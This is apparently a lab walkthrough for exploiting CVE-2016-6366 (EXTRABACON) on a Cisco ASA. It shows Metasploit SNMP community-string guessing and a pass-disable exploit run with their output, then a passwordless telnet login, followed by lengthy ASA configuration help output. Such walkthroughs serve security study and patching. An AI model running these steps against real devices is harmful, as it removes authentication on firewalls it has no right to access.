Skip to content

Latest commit

 

History

History
511 lines (442 loc) · 24.3 KB

How-to-hack-Cisco-ASA-with-CVE-2016-6366.md

File metadata and controls

511 lines (442 loc) · 24.3 KB

Authors: < nixawk >


Cisco ASA - CVE-2016-6366

A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.

The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP (versions 1, 2c, and 3) when enabled on a virtual or physical Cisco ASA device. An attacker could exploit this vulnerability by sending crafted SNMP packets to an SNMP-enabled interface on the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.

Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode only and in single or multiple context mode. This vulnerability can be triggered by IPv4 traffic only. The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3.

Cisco has released software updates that address this vulnerability. Mitigations are listed in the Workarounds section of this advisory.

How to login in Cisco ASA ?

If you known nothing about the Cisco ASA device, please try to discovery something useful with nmap or custom tools/methods.

If snmp is enabled, we can try to crack the password with metasploit.

msf auxiliary(snmp_login) > set PASSWORD public
PASSWORD => public
msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
RHOSTS => 192.168.206.114
msf auxiliary(snmp_login) > run

[+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Now, CVE-2016-6366 can help us exploit remote cisco device.

msf auxiliary(cisco_asa_extrabacon) > show options

Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   MODE       pass-disable     yes       Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
   RETRIES    1                yes       SNMP Retries
   RHOST      192.168.206.114  yes       The target address
   RPORT      161              yes       The target port
   TIMEOUT    1                yes       SNMP Timeout

msf auxiliary(cisco_asa_extrabacon) > run

[*] Building pass-disable payload for version 9.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed

If exploit successully, please try to login it with telnet. The attacker can login into the cisco device with no password.

$ telnet 192.168.206.114
ciscoasa> ?

  clear       Reset functions
  enable      Turn on privileged commands
  exit        Exit from the EXEC
  help        Interactive help for commands
  login       Log in as a particular user
  logout      Exit from the EXEC
  no          Negate a command or set its defaults
  ping        Send echo messages
  quit        Exit from the EXEC
  show        Show running system information
  traceroute  Trace route to destination

How to check cisco version ?

ciscoasa> show version

Cisco Adaptive Security Appliance Software Version 9.2(1)
Device Manager Version 7.2(1)

Compiled on Thu 24-Apr-14 12:14 PDT by builders
System image file is "boot:/asa921-smp-k8.bin"
Config file at boot was "startup-config"

ciscoasa up 2 hours 25 mins

Hardware:   ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,
Internal ATA Compact Flash, 256MB
Slot 1: ATA Compact Flash, 8192MB
BIOS Flash Firmware Hub @ 0x1, 0KB


 0: Ext: Management0/0       : address is 000c.29a9.88d6, irq 10
 1: Ext: GigabitEthernet0/0  : address is 000c.29a9.88e0, irq 5
 2: Ext: GigabitEthernet0/1  : address is 000c.29a9.88ea, irq 9
 3: Ext: GigabitEthernet0/2  : address is 000c.29a9.88f4, irq 10

ASAv Platform License State: Unlicensed
*Install -587174176 vCPU ASAv platform license for full functionality.
The Running Activation Key is not valid, using default settings:

Licensed features for this platform:
Virtual CPUs                      : 0              perpetual
Maximum Physical Interfaces       : 10             perpetual
Maximum VLANs                     : 50             perpetual
Inside Hosts                      : Unlimited      perpetual
Failover                          : Active/Standby perpetual
Encryption-DES                    : Enabled        perpetual
Encryption-3DES-AES               : Enabled        perpetual
Security Contexts                 : 0              perpetual
GTP/GPRS                          : Disabled       perpetual
AnyConnect Premium Peers          : 2              perpetual
AnyConnect Essentials             : Disabled       perpetual
Other VPN Peers                   : 250            perpetual
Total VPN Peers                   : 250            perpetual
Shared License                    : Disabled       perpetual
AnyConnect for Mobile             : Disabled       perpetual
AnyConnect for Cisco VPN Phone    : Disabled       perpetual
Advanced Endpoint Assessment      : Disabled       perpetual
UC Phone Proxy Sessions           : 2              perpetual
Total UC Proxy Sessions           : 2              perpetual
Botnet Traffic Filter             : Enabled        perpetual
Intercompany Media Engine         : Disabled       perpetual
Cluster                           : Disabled       perpetual

This platform has an ASAv VPN Premium license.

Serial Number: 9ATJDXTHK3B
Running Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000

Image type          : Release
Key version         : A

Configuration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016

How to enter into privilege mode ?

enable can be used to enter cisco config mode. Normally, the password is null.

ciscoasa> help enable

USAGE:

    enable [<priv_level>]

DESCRIPTION:

enable      Turn on privileged commands

ciscoasa> enable ?

  <0-15>  Enter optional privilege level (0-15)
  <cr>

  ciscoasa> enable
  Password:
  ciscoasa# configure terminal
  ciscoasa(config)# ?

    aaa                           Enable, disable, or view user authentication,
                                  authorization and accounting
    aaa-server                    Configure a AAA server group or a AAA server
    access-group                  Bind an access-list to an interface to filter
                                  traffic
    access-list                   Configure an access control element
    arp                           Change or view ARP table, set ARP timeout
                                  value, view statistics
    as-path                       BGP autonomous system path filter
    asdm                          Configure Device Manager
    asp                           Configure ASP parameters
    auth-prompt                   Customize authentication challenge, reject or
                                  acceptance prompt
    auto-update                   Configure Auto Update
    banner                        Configure login/session banners
    bgp-community                 format for BGP community
    boot                          Set system boot parameters
    ca                            Certification authority
    call-home                     Smart Call-Home Configuration
    checkheaps                    Configure checkheap verification intervals
    class-map                     Configure MPF Class Map
    clear                         Clear
    client-update                 Configure and change client update parameters
    clock                         Configure time-of-day clock
    cluster                       Cluster configuration
    command-alias                 Create command alias
    community-list                Add a community list entry
    compression                   Configure global Compression parameters
    configure                     Configure using various methods
    console                       Serial console functions
    coredump                      Configure Coredump options
    crashinfo                     Enable/Disable writing crashinfo to flash
    crypto                        Configure IPSec, ISAKMP, Certification
                                  authority, key
    ctl-file                      Configure a ctl-file instance
    ctl-provider                  Configure a CTL Provider instance
    cts                           Cisco Trusted Security commands
    ddns                          Configure dynamic DNS update method
    dhcp-client                   Configure parameters for DHCP client operation
    dhcpd                         Configure DHCP Server
    dhcprelay                     Configure DHCP Relay Agent
    dns                           Add DNS functionality to an interface
    dns-group                     Set the global DNS server group
    dns-guard                     Enforce one DNS response per query
    domain-name                   Change domain name
    dynamic-access-policy-record  Dynamic Access Policy configuration commands
    dynamic-filter                Configure Dynamic Filter
    dynamic-map                   Configure crypto dynamic map
    enable                        Configure password for the enable command
    end                           Exit from configure mode
    established                   Allow inbound connections based on established
                                  connections
    event                         Configure event manager
    exit                          Exit from config mode
    failover                      Enable/disable failover feature
    filter                        Enable or disable URL, FTP, HTTPS, Java, and
                                  ActiveX filtering
    fips                          FIPS 140-2 compliance information
    firewall                      Switch to router/transparent mode
    fixup                         Add or delete inspection services
    flow-export                   Configure flow information export through
                                  NetFlow
    fragment                      Configure the IP fragment database
    ftp                           Set FTP mode
    ftp-map                       Configure advanced options for FTP inspection
    group-delimiter               The delimiter for tunnel-group lookup.
    group-policy                  Configure or remove a group policy
    gtp-map                       Configure advanced options for GTP inspection
    h225-map                      Configure advanced options for H225 inspection
    help                          Interactive help for commands
    hostname                      Change host name of the system
    hpm                           Configure TopN host statistics collection
    http                          Configure http server and https related
                                  commands
    http-map                      This command has been deprecated.
    icmp                          Configure access rules for ICMP traffic
    imap4s                        Configure the imap4s service
    interface                     Select an interface to configure
    ip                            Configure IP address pools
    ip                            Configure IP addresses, address pools, IDS, etc
    ipsec                         Configure transform-set, IPSec SA lifetime and
                                  PMTU Aging reset timer
    ipv6                          Configure IPv6 address pools
    ipv6                          Global IPv6 configuration commands
    ipv6-vpn-addr-assign          Global settings for VPN IP address assignment
                                  policy
    isakmp                        Configure ISAKMP options
    jumbo-frame                   Configure jumbo-frame support
    key                           Create various configuration keys
    l2tp                          Configure Global L2TP Parameters
    ldap                          Configure LDAP Mapping
    logging                       Configure logging levels, recipients and other
                                  options
    logout                        Logoff from config mode
    mac-address                   MAC address options
    mac-list                      Create a mac-list to filter based on MAC
                                  address
    management-access             Configure management access interface
    map                           Configure crypto map
    media-termination             Configure a media-termination instance
    mgcp-map                      Configure advanced options for MGCP inspection
    migrate                       Migrate IKEv1 configuration to IKEv2/SSL
    monitor-interface             Enable or disable failover monitoring on a
                                  specific interface
    mount                         Configure a system mount
    mroute                        Configure static multicast routes
    mtu                           Specify MTU(Maximum Transmission Unit) for an
                                  interface
    multicast-routing             Enable IP multicast
    name                          Associate a name with an IP address
    names                         Enable/Disable IP address to name mapping
    nat                           Associate a network with a pool of global IP
                                  addresses
    no                            Negate a command or set its defaults
    ntp                           Configure NTP
    nve                           Configure an Network Virtulization Endpoint
                                  (NVE)
    object                        Configure an object
    object-group                  Create an object group for use in
                                  'access-list', etc
    object-group-search           Enables object group search algorithm
    pager                         Control page length for pagination
    passwd                        Change Telnet console access password
    password                      Configure password encryption
    password-policy               Configure password policy options
    phone-proxy                   Configure a Phone proxy instance
    pim                           Configure Protocol Independent Multicast
    policy-list                   Define IP Policy list
    policy-map                    Configure MPF Parameter Map
    pop3s                         Configure the pop3s service
    prefix-list                   Build a prefix list
    priority-queue                Enter sub-command mode to set priority-queue
                                  attributes
    privilege                     Configure privilege levels for commands
    prompt                        Configure session prompt display
    quit                          Exit from config mode
    quota                         Configure quotas
    regex                         Define a regular expression
    remote-access                 Configure SNMP trap threshold for VPN
                                  remote-access sessions
    route                         Configure a static route for an interface
    route-map                     Create route-map or enter route-map
                                  configuration mode
    router                        Enable a routing process
    same-security-traffic         Enable same security level interfaces to
                                  communicate
    scansafe                      Scansafe configuration
    service                       Configure system services
    service-interface             service-interface for dynamic interface types
    service-policy                Configure MPF service policy
    setup                         Pre-configure the system
    sla                           IP Service Level Agreement
    smtp-server                   Configure default SMTP server address to be
                                  used for Email
    smtps                         Configure the smtps service
    snmp                          Configure the SNMP options
    snmp-map                      Configure an snmp-map, to control the operation
                                  of the SNMP inspection
    snmp-server                   Modify SNMP engine parameters
    ssh                           Configure SSH options
    ssl                           Configure SSL options
    sunrpc-server                 Create SUNRPC services table
    sysopt                        Set system functional options
    tcp-map                       Configure advanced options for TCP inspection
    telnet                        Add telnet access to system console or set idle
                                  timeout
    terminal                      Set terminal line parameters
    tftp-server                   Configure default TFTP server address and
                                  directory
    threat-detection              Show threat detection information
    time-range                    Define time range entries
    timeout                       Configure maximum idle times
    tls-proxy                     Configure a TLS proxy instance or the maximum
                                  sessions
    track                         Object tracking configuration commands
    tunnel-group                  Create and manage the database of connection
                                  specific records for IPSec connections
    tunnel-group-map              Specify policy by which the tunnel-group name
                                  is derived from the content of a certificate.
    uc-ime                        Configure a Cisco Intercompany Media Engine
                                  (UC-IME) instance
    url-block                     Enable URL pending block buffer and long URL
                                  support
    url-cache                     Enable/Disable URL caching
    url-server                    Configure a URL filtering server
    user-identity                 Configure user-identity firewall
    username                      Configure user authentication local database
    virtual                       Configure address for authentication virtual
                                  servers
    vnmc                          Configure VNMC params
    vpdn                          Configure VPDN feature
    vpn                           Configure VPN parameters.
    vpn-addr-assign               Global settings for VPN IP address assignment
                                  policy
    vpn-sessiondb                 Configure the VPN Session Manager
    vpnsetup                      Configure VPN Setup Commands
    vxlan                         Configure VXLAN system parameters
    wccp                          Web-Cache Coordination Protocol Commands
    webvpn                        Configure the WebVPN service
    xlate                         Configure an xlate option
    zonelabs-integrity            ZoneLabs integrity Firewall Server
                                  Configuration

How to configure cisco interface ?

ciscoasa(config)# interface ?

configure mode commands/options:
  GigabitEthernet  GigabitEthernet IEEE 802.3z
  Management       Management interface
  Redundant        Redundant Interface
  TVI              Tenant Virtual Interface
  vni              VNI Interface
  <cr>

ciscoasa(config)# interface GigabitEthernet ?

configure mode commands/options:
  <0-0>  GigabitEthernet interface number

ciscoasa(config)# interface GigabitEthernet 0/?

configure mode commands/options:
  <0-2>  GigabitEthernet interface number

ciscoasa(config)# interface GigabitEthernet 0/0

How to set ip address ?

ciscoasa(config-if)# ?

Interface configuration commands:
  authentication   authentication subcommands
  ddns             Configure dynamic DNS
  default          Set a command to its defaults
  delay            Specify interface throughput delay
  description      Interface specific description
  dhcp             Configure parameters for DHCP client
  dhcprelay        Configure DHCP Relay Agent
  duplex           Configure duplex operation
  exit             Exit from interface configuration mode
  flowcontrol      Configure flowcontrol operation
  hello-interval   Configures EIGRP-IPv4 hello interval
  help             Interactive help for interface subcommands
  hold-time        Configures EIGRP-IPv4 hold time
  igmp             IGMP interface commands
  ip               Configure the ip address
  ipv6             IPv6 interface subcommands
  mac-address      Assign MAC address to interface
  management-only  Dedicate an interface to management. Block thru traffic
  mfib             Interface Specific MFIB Control
  multicast        Configure multicast routing
  nameif           Assign name to interface
  no               Negate a command or set its defaults
  ospf             OSPF interface commands
  pim              PIM interface commands
  pppoe            Configure parameters for PPPoE client
  rip              Router Information Protocol
  security-level   Specify the security level of this interface after this
                   keyword, Eg: 0, 100 etc. The relative security level between
                   two interfaces determines the way the Adaptive Security
                   Algorithm is applied. A lower security_level interface is
                   outside relative to a higher level interface and equivalent
                   interfaces are outside to each other
  shutdown         Shutdown the selected interface
  speed            Configure speed operation
  split-horizon    Configures EIGRP-IPv4 split-horizon
  summary-address  Configures EIGRP-IPv4 summary-address
ciscoasa(config-if)# ip address ?

interface mode commands/options:
  Hostname or A.B.C.D  Firewall's network interface address
  dhcp                 Keyword to use DHCP to poll for information. Enables the
                       DHCP client feature on the specified interface
  pppoe                Keyword to use PPPoE to poll for information. Enables
                       the PPPoE client feature on the specified interface
ciscoasa(config)#  ip address 192.168.206.114 255.255.255.0
ciscoasa(config-if)# no shutdown
ciscoasa(config-if)# exit
ciscoasa(config)# exit
ciscoasa# ping 192.168.206.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.206.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms

How to enable snmp service ?

ciscoasa# configure terminal
ciscoasa(config)# snmp-server host inside 192.168.206.1 community 0 public

How to enable enable SSH service ?

ciscoasa# configure terminal
ciscoasa(config)# username admin password password
ciscoasa(config)# aaa authentication ssh console LOCAL
ciscoasa(config)# passwd password
ciscoasa(config)# crypto key generate rsa ?            

configure mode commands/options:
  general-keys  Generate a general purpose RSA key pair for signing and
                encryption
  label         Provide a label
  modulus       Provide number of modulus bits on the command line
  noconfirm     Specify this keyword to suppress all interactive prompting.
  usage-keys    Generate seperate RSA key pairs for signing and encryption
  <cr>
ciscoasa(config)# crypto key generate rsa modulus ?

configure mode commands/options:
  1024  1024 bits
  2048  2048 bits
  4096  4096 bits
  512   512 bits
  768   768 bits

ciscoasa(config)#  ssh 192.168.206.1 255.255.255.0 inside
ciscoasa(config)#  ssh 192.168.206.137 255.255.255.0 inside
ciscoasa(config)#  ssh version 2

How to enable Telnet service ?

ciscoasa# configure terminal
ciscoasa(config)# aaa authentication telnet console LOCAL
ciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside

Links

  1. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
  2. http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/118075-configure-asa-00.html
  3. https://github.com/RiskSense-Ops/CVE-2016-6366/
  4. http://paper.seebug.org/31/